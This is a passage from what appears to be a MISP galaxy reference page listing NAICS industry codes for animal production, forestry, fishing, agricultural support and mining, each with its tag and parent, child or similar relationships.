  • parent-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

1121

Cattle Ranching and Farming

The tag is: misp-galaxy:naics="1121"

1121 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112130" with estimative-language:likelihood-probability="likely"

11211

Beef Cattle Ranching and Farming, including Feedlots

The tag is: misp-galaxy:naics="11211"

11211 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

112111

Beef Cattle Ranching and Farming

The tag is: misp-galaxy:naics="112111"

112111 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

112112

Cattle Feedlots

The tag is: misp-galaxy:naics="112112"

112112 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

11212

Dairy Cattle and Milk Production

The tag is: misp-galaxy:naics="11212"

11212 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112120" with estimative-language:likelihood-probability="likely"

112120

Dairy Cattle and Milk Production

The tag is: misp-galaxy:naics="112120"

112120 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11212" with estimative-language:likelihood-probability="likely"

11213

Dual-Purpose Cattle Ranching and Farming

The tag is: misp-galaxy:naics="11213"

11213 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112130" with estimative-language:likelihood-probability="likely"

112130

Dual-Purpose Cattle Ranching and Farming

The tag is: misp-galaxy:naics="112130"

112130 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11213" with estimative-language:likelihood-probability="likely"

1122

Hog and Pig Farming

The tag is: misp-galaxy:naics="1122"

1122 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112210" with estimative-language:likelihood-probability="likely"

11221

Hog and Pig Farming

The tag is: misp-galaxy:naics="11221"

11221 has relationships with:

  • child-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112210" with estimative-language:likelihood-probability="likely"

112210

Hog and Pig Farming

The tag is: misp-galaxy:naics="112210"

112210 has relationships with:

  • child-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11221" with estimative-language:likelihood-probability="likely"

1123

Poultry and Egg Production

The tag is: misp-galaxy:naics="1123"

1123 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11234" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112390" with estimative-language:likelihood-probability="likely"

11231

Chicken Egg Production

The tag is: misp-galaxy:naics="11231"

11231 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112310" with estimative-language:likelihood-probability="likely"

112310

Chicken Egg Production

The tag is: misp-galaxy:naics="112310"

112310 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11231" with estimative-language:likelihood-probability="likely"

11232

Broilers and Other Meat Type Chicken Production

The tag is: misp-galaxy:naics="11232"

11232 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112320" with estimative-language:likelihood-probability="likely"

112320

Broilers and Other Meat Type Chicken Production

The tag is: misp-galaxy:naics="112320"

112320 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11232" with estimative-language:likelihood-probability="likely"

11233

Turkey Production

The tag is: misp-galaxy:naics="11233"

11233 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112330" with estimative-language:likelihood-probability="likely"

112330

Turkey Production

The tag is: misp-galaxy:naics="112330"

112330 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11233" with estimative-language:likelihood-probability="likely"

11234

Poultry Hatcheries

The tag is: misp-galaxy:naics="11234"

11234 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112340" with estimative-language:likelihood-probability="likely"

112340

Poultry Hatcheries

The tag is: misp-galaxy:naics="112340"

112340 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11234" with estimative-language:likelihood-probability="likely"

11239

Other Poultry Production

The tag is: misp-galaxy:naics="11239"

11239 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112390" with estimative-language:likelihood-probability="likely"

112390

Other Poultry Production

The tag is: misp-galaxy:naics="112390"

112390 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11239" with estimative-language:likelihood-probability="likely"

1124

Sheep and Goat Farming

The tag is: misp-galaxy:naics="1124"

1124 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112420" with estimative-language:likelihood-probability="likely"

11241

Sheep Farming

The tag is: misp-galaxy:naics="11241"

11241 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112410" with estimative-language:likelihood-probability="likely"

112410

Sheep Farming

The tag is: misp-galaxy:naics="112410"

112410 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11241" with estimative-language:likelihood-probability="likely"

11242

Goat Farming

The tag is: misp-galaxy:naics="11242"

11242 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112420" with estimative-language:likelihood-probability="likely"

112420

Goat Farming

The tag is: misp-galaxy:naics="112420"

112420 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11242" with estimative-language:likelihood-probability="likely"

1125

Aquaculture

The tag is: misp-galaxy:naics="1125"

1125 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112519" with estimative-language:likelihood-probability="likely"

11251

Aquaculture

The tag is: misp-galaxy:naics="11251"

11251 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112511

Finfish Farming and Fish Hatcheries

The tag is: misp-galaxy:naics="112511"

112511 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112512

Shellfish Farming

The tag is: misp-galaxy:naics="112512"

112512 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112519

Other Aquaculture

The tag is: misp-galaxy:naics="112519"

112519 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

1129

Other Animal Production

The tag is: misp-galaxy:naics="1129"

1129 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11293" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112990" with estimative-language:likelihood-probability="likely"

11291

Apiculture

The tag is: misp-galaxy:naics="11291"

11291 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112910" with estimative-language:likelihood-probability="likely"

112910

Apiculture

The tag is: misp-galaxy:naics="112910"

112910 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11291" with estimative-language:likelihood-probability="likely"

11292

Horses and Other Equine Production

The tag is: misp-galaxy:naics="11292"

11292 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112920" with estimative-language:likelihood-probability="likely"

112920

Horses and Other Equine Production

The tag is: misp-galaxy:naics="112920"

112920 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11292" with estimative-language:likelihood-probability="likely"

11293

Fur-Bearing Animal and Rabbit Production

The tag is: misp-galaxy:naics="11293"

11293 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112930" with estimative-language:likelihood-probability="likely"

112930

Fur-Bearing Animal and Rabbit Production

The tag is: misp-galaxy:naics="112930"

112930 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11293" with estimative-language:likelihood-probability="likely"

11299

All Other Animal Production

The tag is: misp-galaxy:naics="11299"

11299 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112990" with estimative-language:likelihood-probability="likely"

112990

All Other Animal Production

The tag is: misp-galaxy:naics="112990"

112990 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11299" with estimative-language:likelihood-probability="likely"

113

Forestry and Logging

The tag is: misp-galaxy:naics="113"

113 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

1131

Timber Tract Operations

The tag is: misp-galaxy:naics="1131"

1131 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113110" with estimative-language:likelihood-probability="likely"

11311

Timber Tract Operations

The tag is: misp-galaxy:naics="11311"

11311 has relationships with:

  • child-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113110" with estimative-language:likelihood-probability="likely"

113110

Timber Tract Operations

The tag is: misp-galaxy:naics="113110"

113110 has relationships with:

  • child-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11311" with estimative-language:likelihood-probability="likely"

1132

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="1132"

1132 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113210" with estimative-language:likelihood-probability="likely"

11321

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="11321"

11321 has relationships with:

  • child-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113210" with estimative-language:likelihood-probability="likely"

113210

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="113210"

113210 has relationships with:

  • child-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11321" with estimative-language:likelihood-probability="likely"

1133

Logging

The tag is: misp-galaxy:naics="1133"

1133 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113310" with estimative-language:likelihood-probability="likely"

11331

Logging

The tag is: misp-galaxy:naics="11331"

11331 has relationships with:

  • child-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113310" with estimative-language:likelihood-probability="likely"

113310

Logging

The tag is: misp-galaxy:naics="113310"

113310 has relationships with:

  • child-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11331" with estimative-language:likelihood-probability="likely"

114

Fishing, Hunting and Trapping

The tag is: misp-galaxy:naics="114"

114 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

1141

Fishing

The tag is: misp-galaxy:naics="1141"

1141 has relationships with:

  • child-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114119" with estimative-language:likelihood-probability="likely"

11411

Fishing

The tag is: misp-galaxy:naics="11411"

11411 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114111

Finfish Fishing

The tag is: misp-galaxy:naics="114111"

114111 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114112

Shellfish Fishing

The tag is: misp-galaxy:naics="114112"

114112 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114119

Other Marine Fishing

The tag is: misp-galaxy:naics="114119"

114119 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

1142

Hunting and Trapping

The tag is: misp-galaxy:naics="1142"

1142 has relationships with:

  • child-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114210" with estimative-language:likelihood-probability="likely"

11421

Hunting and Trapping

The tag is: misp-galaxy:naics="11421"

11421 has relationships with:

  • child-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="114210" with estimative-language:likelihood-probability="likely"

114210

Hunting and Trapping

The tag is: misp-galaxy:naics="114210"

114210 has relationships with:

  • child-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11421" with estimative-language:likelihood-probability="likely"

115

Support Activities for Agriculture and Forestry

The tag is: misp-galaxy:naics="115"

115 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

1151

Support Activities for Crop Production

The tag is: misp-galaxy:naics="1151"

1151 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115116" with estimative-language:likelihood-probability="likely"

11511

Support Activities for Crop Production

The tag is: misp-galaxy:naics="11511"

11511 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115111

Cotton Ginning

The tag is: misp-galaxy:naics="115111"

115111 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115112

Soil Preparation, Planting, and Cultivating

The tag is: misp-galaxy:naics="115112"

115112 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115113

Crop Harvesting, Primarily by Machine

The tag is: misp-galaxy:naics="115113"

115113 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115114

Postharvest Crop Activities (except Cotton Ginning)

The tag is: misp-galaxy:naics="115114"

115114 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115115

Farm Labor Contractors and Crew Leaders

The tag is: misp-galaxy:naics="115115"

115115 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115116

Farm Management Services

The tag is: misp-galaxy:naics="115116"

115116 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

1152

Support Activities for Animal Production

The tag is: misp-galaxy:naics="1152"

1152 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115210" with estimative-language:likelihood-probability="likely"

11521

Support Activities for Animal Production

The tag is: misp-galaxy:naics="11521"

11521 has relationships with:

  • child-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="115210" with estimative-language:likelihood-probability="likely"

115210

Support Activities for Animal Production

The tag is: misp-galaxy:naics="115210"

115210 has relationships with:

  • child-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11521" with estimative-language:likelihood-probability="likely"

1153

Support Activities for Forestry

The tag is: misp-galaxy:naics="1153"

1153 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115310" with estimative-language:likelihood-probability="likely"

11531

Support Activities for Forestry

The tag is: misp-galaxy:naics="11531"

11531 has relationships with:

  • child-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="115310" with estimative-language:likelihood-probability="likely"

115310

Support Activities for Forestry

The tag is: misp-galaxy:naics="115310"

115310 has relationships with:

  • child-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11531" with estimative-language:likelihood-probability="likely"

21

Mining, Quarrying, and Oil and Gas Extraction

The tag is: misp-galaxy:naics="21"

21 has relationships with:

  • parent-of: misp-galaxy:naics="211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213" with estimative-language:likelihood-probability="likely"

211

Oil and Gas Extraction

The tag is: misp-galaxy:naics="211"

211 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

2111

Oil and Gas Extraction

The tag is: misp-galaxy:naics="2111"

2111 has relationships with:

  • child-of: misp-galaxy:naics="211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="211130" with estimative-language:likelihood-probability="likely"

21112

Crude Petroleum Extraction 

The tag is: misp-galaxy:naics="21112"

21112 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"

211120

Crude Petroleum Extraction 

The tag is: misp-galaxy:naics="211120"

211120 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"

21113

Natural Gas Extraction 

The tag is: misp-galaxy:naics="21113"

21113 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="211130" with estimative-language:likelihood-probability="likely"

211130

Natural Gas Extraction 

The tag is: misp-galaxy:naics="211130"

211130 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21113" with estimative-language:likelihood-probability="likely"

212

Mining (except Oil and Gas)

The tag is: misp-galaxy:naics="212"

212 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

2121

Coal Mining

The tag is: misp-galaxy:naics="2121"

2121 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212115" with estimative-language:likelihood-probability="likely"

21211

Coal Mining

The tag is: misp-galaxy:naics="21211"

21211 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

212114

Surface Coal Mining

The tag is: misp-galaxy:naics="212114"

212114 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

212115

Underground Coal Mining

The tag is: misp-galaxy:naics="212115"

212115 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

2122

Metal Ore Mining

The tag is: misp-galaxy:naics="2122"

2122 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212290" with estimative-language:likelihood-probability="likely"

21221

Iron Ore Mining

The tag is: misp-galaxy:naics="21221"

21221 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212210" with estimative-language:likelihood-probability="likely"

212210

Iron Ore Mining

The tag is: misp-galaxy:naics="212210"

212210 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21221" with estimative-language:likelihood-probability="likely"

21222

Gold Ore and Silver Ore Mining

The tag is: misp-galaxy:naics="21222"

21222 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212220" with estimative-language:likelihood-probability="likely"

212220

Gold Ore and Silver Ore Mining

The tag is: misp-galaxy:naics="212220"

212220 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21222" with estimative-language:likelihood-probability="likely"

21223

Copper, Nickel, Lead, and Zinc Mining

The tag is: misp-galaxy:naics="21223"

21223 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212230" with estimative-language:likelihood-probability="likely"

212230

Copper, Nickel, Lead, and Zinc Mining

The tag is: misp-galaxy:naics="212230"

212230 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21223" with estimative-language:likelihood-probability="likely"

21229

Other Metal Ore Mining

The tag is: misp-galaxy:naics="21229"

21229 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212290" with estimative-language:likelihood-probability="likely"

212290

Other Metal Ore Mining

The tag is: misp-galaxy:naics="212290"

212290 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21229" with estimative-language:likelihood-probability="likely"

2123

Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="2123"

2123 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212390" with estimative-language:likelihood-probability="likely"

21231

Stone Mining and Quarrying

The tag is: misp-galaxy:naics="21231"

21231 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212311

Dimension Stone Mining and Quarrying

The tag is: misp-galaxy:naics="212311"

212311 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212312

Crushed and Broken Limestone Mining and Quarrying

The tag is: misp-galaxy:naics="212312"

212312 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212313

Crushed and Broken Granite Mining and Quarrying

The tag is: misp-galaxy:naics="212313"

212313 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212319

Other Crushed and Broken Stone Mining and Quarrying

The tag is: misp-galaxy:naics="212319"

212319 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

21232

Sand, Gravel, Clay, and Ceramic and Refractory Minerals Mining and Quarrying

The tag is: misp-galaxy:naics="21232"

21232 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212321

Construction Sand and Gravel Mining

The tag is: misp-galaxy:naics="212321"

212321 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212322

Industrial Sand Mining

The tag is: misp-galaxy:naics="212322"

212322 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212323

Kaolin, Clay, and Ceramic and Refractory Minerals Mining

